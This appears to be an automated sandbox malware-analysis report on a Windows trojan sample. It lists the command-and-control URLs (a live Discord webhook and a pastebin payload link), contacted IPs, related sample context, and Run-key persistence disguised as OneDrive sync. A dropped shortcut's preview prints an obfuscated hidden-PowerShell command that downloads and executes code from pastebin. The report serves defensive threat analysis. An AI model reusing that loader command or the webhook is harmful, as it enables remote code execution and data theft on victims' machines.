                  http://pastebin.com/raw/sA04Mwk2false
                    		unknown
                    https://pastebin.com/raw/sA04Mwk2false
                      		unknown
                      https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2true
                        		unknown
                        http://tinyurl.com/bdhpvpnyfalse
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://discord.compowershell.exe, 0000000A.00000002.2993893334.000002544344C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE492F000.00000004.00000800.00020000.00000000.sdmptrue
                            		unknown
                            https://discord.com/api/webhooks/128545359042878powershell.exe, 0000000A.00000002.2993893334.000002544344C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE492F000.00000004.00000800.00020000.00000000.sdmptrue
                              		unknown
                              https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_powershell.exe, 0000000F.00000002.2855452101.000001FDE3FFB000.00000004.00000800.00020000.00000000.sdmptrue
                                		unknown
                                https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQpowershell.exe, 0000000A.00000002.2993893334.0000025442A2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3FFB000.00000004.00000800.00020000.00000000.sdmptrue
                                  		unknown
                                  https://raw.githubusercontent.compowershell.exe, 0000000A.00000002.2993893334.00000254429C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3F92000.00000004.00000800.00020000.00000000.sdmptrue
                                    		unknown
                                    https://go.micropowershell.exe, 0000000A.00000002.2993893334.00000254423A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3A26000.00000004.00000800.00020000.00000000.sdmptrue
                                    • URL Reputation: safe
                                    		unknown
                                    http://raw.githubusercontent.compowershell.exe, 0000000A.00000002.2993893334.0000025442993000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2993893334.00000254429C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3F92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://discord.compowershell.exe, 0000000A.00000002.2993893334.000002544344C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE492F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://aka.ms/pscore68powershell.exe, 0000000A.00000002.2993893334.0000025441EE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2993893334.0000025441EFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE34B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE34CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.2993893334.0000025441EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3495000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://pastebin.compowershell.exe, 0000000A.00000002.2993893334.0000025442914000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2993893334.00000254428FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2993893334.00000254423A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3EE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3EC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3A26000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://pastebin.compowershell.exe, 0000000A.00000002.2993893334.0000025442904000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            104.20.3.235
                                            		pastebin.comUnited States
                                            		13335CLOUDFLARENETUStrue
                                            162.159.136.232
                                            		discord.comUnited States
                                            		13335CLOUDFLARENETUStrue
                                            104.17.112.233
                                            		tinyurl.comUnited States
                                            		13335CLOUDFLARENETUStrue
                                            185.199.108.133
                                            		raw.githubusercontent.comNetherlands
                                            		54113FASTLYUStrue

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1534114
                                            Start date and time:2024-10-15 16:13:05 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 6m 21s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Run name:Run with higher sleep bypass
                                            Number of analysed new started processes analysed:17
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:vF20HtY4a4.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:f06b0c9ae4553b0558c06ecfcb657a9f1d5a42da37caec81ae4a91dd5d03b332.exe
                                            Detection:MAL
                                            Classification:mal92.troj.evad.winEXE@19/14@4/4
                                            EGA Information:Failed
                                            HCA Information:
                                            • Successful, ratio: 67%
                                            • Number of executed functions: 13
                                            • Number of non-executed functions: 1
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                            Warnings

                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target powershell.exe, PID 6272 because it is empty
                                            • Execution Graph export aborted for target vF20HtY4a4.exe, PID 5028 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: vF20HtY4a4.exe

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            16:14:21AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                            16:14:29AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            104.20.3.235OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • pastebin.com/raw/sA04Mwk2
                                            5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                            • pastebin.com/raw/sA04Mwk2
                                            Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                            • pastebin.com/raw/sA04Mwk2
                                            BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                            • pastebin.com/raw/sA04Mwk2
                                            sostener.vbsGet hashmaliciousNjratBrowse
                                            • pastebin.com/raw/V9y5Q5vv
                                            SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                            • pastebin.com/raw/V9y5Q5vv
                                            sostener.vbsGet hashmaliciousRemcosBrowse
                                            • pastebin.com/raw/V9y5Q5vv
                                            New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                            • pastebin.com/raw/NsQ5qTHr
                                            Invoice-883973938.jsGet hashmaliciousWSHRATBrowse
                                            • pastebin.com/raw/NsQ5qTHr
                                            2024 12_59_31 a.m..jsGet hashmaliciousWSHRATBrowse
                                            • pastebin.com/raw/NsQ5qTHr
                                            162.159.136.232S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                            • discord.com/administrator/index.php

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            discord.comVvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 162.159.138.232
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.137.232
                                            5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                            • 162.159.128.233
                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                            • 162.159.136.232
                                            xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.138.232
                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.138.232
                                            Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.138.232
                                            cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                            • 162.159.138.232
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.138.232
                                            tinyurl.comVvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 104.18.111.161
                                            5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                            • 104.18.111.161
                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                            • 104.17.112.233
                                            BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                            • 104.18.111.161
                                            https://tinyurl.com/y9r5fvasGet hashmaliciousUnknownBrowse
                                            • 104.17.112.233
                                            https://tinyurl.com/5xa2ubd7Get hashmaliciousUnknownBrowse
                                            • 104.17.112.233
                                            SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                            • 104.17.112.233
                                            SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                            • 104.17.112.233
                                            SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 104.18.111.161
                                            pastebin.comVvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 172.67.19.24
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 104.20.3.235
                                            5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                            • 104.20.3.235
                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                            • 104.20.4.235
                                            xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                            • 172.67.19.24
                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                            • 172.67.19.24
                                            Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                            • 104.20.3.235
                                            gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                            • 172.67.19.24
                                            cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                            • 172.67.19.24
                                            raw.githubusercontent.comVvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 185.199.108.133
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 185.199.108.133
                                            5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                            • 185.199.109.133
                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                            • 185.199.109.133
                                            xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                            • 185.199.110.133
                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                            • 185.199.109.133
                                            Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                            • 185.199.111.133
                                            cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                            • 185.199.111.133
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 185.199.109.133

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            CLOUDFLARENETUShttps://e-sign-acrbatslgnatur3-na3d0cu-s3ttl3w3nt-vi3w-d0c-qanz7dg.s3.us-west-2.amazonaws.com/stationaries/confirmation/7253gdhsjHDSGD8374GDHSHDG3746gbds628r637dbf67whd/KtbxLxgVShqnkTnvnxXXfgcmtZDCqxDrLV/pay4app.html#anBvd2VyQGdlbXN0b25lZm9vZHMuY29tGet hashmaliciousUnknownBrowse
                                            • 172.67.197.237
                                            Aunali_khokhawala-In Services.Agreement-SDYAMPA 416944.rtfGet hashmaliciousEvilProxy, Fake Captcha, HTMLPhisherBrowse
                                            • 188.114.96.3
                                            VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 104.18.111.161
                                            https://pub-d44e201c1f3e400586cb81b0f2d48f61.r2.dev/owasecure.htm?top=redacted_emailGet hashmaliciousHTMLPhisherBrowse
                                            • 104.17.25.14
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.137.232
                                            5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                            • 162.159.128.233
                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                            • 104.17.112.233
                                            xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                            • 172.67.19.24
                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.138.232
                                            CLOUDFLARENETUShttps://e-sign-acrbatslgnatur3-na3d0cu-s3ttl3w3nt-vi3w-d0c-qanz7dg.s3.us-west-2.amazonaws.com/stationaries/confirmation/7253gdhsjHDSGD8374GDHSHDG3746gbds628r637dbf67whd/KtbxLxgVShqnkTnvnxXXfgcmtZDCqxDrLV/pay4app.html#anBvd2VyQGdlbXN0b25lZm9vZHMuY29tGet hashmaliciousUnknownBrowse
                                            • 172.67.197.237
                                            Aunali_khokhawala-In Services.Agreement-SDYAMPA 416944.rtfGet hashmaliciousEvilProxy, Fake Captcha, HTMLPhisherBrowse
                                            • 188.114.96.3
                                            VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 104.18.111.161
                                            https://pub-d44e201c1f3e400586cb81b0f2d48f61.r2.dev/owasecure.htm?top=redacted_emailGet hashmaliciousHTMLPhisherBrowse
                                            • 104.17.25.14
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.137.232
                                            5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                            • 162.159.128.233
                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                            • 104.17.112.233
                                            xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                            • 172.67.19.24
                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.138.232
                                            CLOUDFLARENETUShttps://e-sign-acrbatslgnatur3-na3d0cu-s3ttl3w3nt-vi3w-d0c-qanz7dg.s3.us-west-2.amazonaws.com/stationaries/confirmation/7253gdhsjHDSGD8374GDHSHDG3746gbds628r637dbf67whd/KtbxLxgVShqnkTnvnxXXfgcmtZDCqxDrLV/pay4app.html#anBvd2VyQGdlbXN0b25lZm9vZHMuY29tGet hashmaliciousUnknownBrowse
                                            • 172.67.197.237
                                            Aunali_khokhawala-In Services.Agreement-SDYAMPA 416944.rtfGet hashmaliciousEvilProxy, Fake Captcha, HTMLPhisherBrowse
                                            • 188.114.96.3
                                            VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 104.18.111.161
                                            https://pub-d44e201c1f3e400586cb81b0f2d48f61.r2.dev/owasecure.htm?top=redacted_emailGet hashmaliciousHTMLPhisherBrowse
                                            • 104.17.25.14
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.137.232
                                            5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                            • 162.159.128.233
                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                            • 104.17.112.233
                                            xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                            • 172.67.19.24
                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.138.232
                                            FASTLYUSVvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 185.199.108.133
                                            https://pub-d44e201c1f3e400586cb81b0f2d48f61.r2.dev/owasecure.htm?top=redacted_emailGet hashmaliciousHTMLPhisherBrowse
                                            • 151.101.2.137
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 185.199.108.133
                                            5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                            • 185.199.109.133
                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                            • 185.199.109.133
                                            xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                            • 185.199.110.133
                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                            • 185.199.109.133
                                            Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                            • 185.199.111.133
                                            cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                            • 185.199.111.133

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            3b5074b1b5d032e5620f69f9f700ff0erComandaKOMARONTRADESRL435635Lukketid.batGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 104.20.3.235
                                            • 185.199.108.133
                                            • 162.159.136.232
                                            VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 104.20.3.235
                                            • 185.199.108.133
                                            • 162.159.136.232
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 104.20.3.235
                                            • 185.199.108.133
                                            • 162.159.136.232
                                            5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                            • 104.20.3.235
                                            • 185.199.108.133
                                            • 162.159.136.232
                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                            • 104.20.3.235
                                            • 185.199.108.133
                                            • 162.159.136.232
                                            xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                            • 104.20.3.235
                                            • 185.199.108.133
                                            • 162.159.136.232
                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                            • 104.20.3.235
                                            • 185.199.108.133
                                            • 162.159.136.232
                                            Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                            • 104.20.3.235
                                            • 185.199.108.133
                                            • 162.159.136.232
                                            gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                            • 104.20.3.235
                                            • 185.199.108.133
                                            • 162.159.136.232

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                            Category:dropped
                                            Size (bytes):1728
                                            Entropy (8bit):4.527272298423835
                                            Encrypted:false
                                            SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                            MD5:724AA21828AD912CB466E3B0A79F478B
                                            SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                            SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                            SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                            Malicious:true
                                            Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):11608
                                            Entropy (8bit):4.890472898059848
                                            Encrypted:false
                                            SSDEEP:192:39smG3YrKkDQp5SVsm5emln9smKp5FiMDOmEN3H+OHgFKxoeRH83YrKk7Vsm5emK:cEU/iQ0HzAFGLCib4Sib47VoGIpN6KQc
                                            MD5:66B287A82D897FD706FD1C8A5098E8A5
                                            SHA1:9C5962E1ECA4CFC2D5BC8BA4C6C737F77EC524F8
                                            SHA-256:5009DAAF58FD83E555547764CC1AE0F55B664B4A41AEF5EECB1963C7F6A0C413
                                            SHA-512:5A5713E9F6F1A32E7120838EA5CC4651D1ADA684685D11B6DDEF1CCBD4ED759DAD9D857C36FB2F9B4B6637BCC27ABC3C89BE9428C4CB117817D3F6468DD1DEBB
                                            Malicious:false
                                            Preview:PSMODULECACHE......x.g.z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope........-Z..z..a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........x.g.z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........AfterEa

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):1.1940658735648508
                                            Encrypted:false
                                            SSDEEP:3:Nlllulv4iZ:NllUg
                                            MD5:70F8065256CFB7FD75CA2A8F72BA3FA4
                                            SHA1:5A09385998FD735B5E5BD54F5901F3B180363A57
                                            SHA-256:F5DCDC55A3BF26D5E74BE7BA34D146984239C1CF7859C598B2B5A7C1A912755B
                                            SHA-512:CE4EEEC66F3553833690F46A08D17D9165D733753A2629998961A19EE57B94CF78961B1C3A0364434A943FF6DC964C5D15233224E8CC4E62507EA792313CC5D4
                                            Malicious:false
                                            Preview:@...e.................................~..............@..........

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dthnimqk.0vg.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dze1nqmi.y4w.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkfodyjm.ike.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iyketovy.sud.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q1i2tp1t.klq.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rsm4rwk5.4ih.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
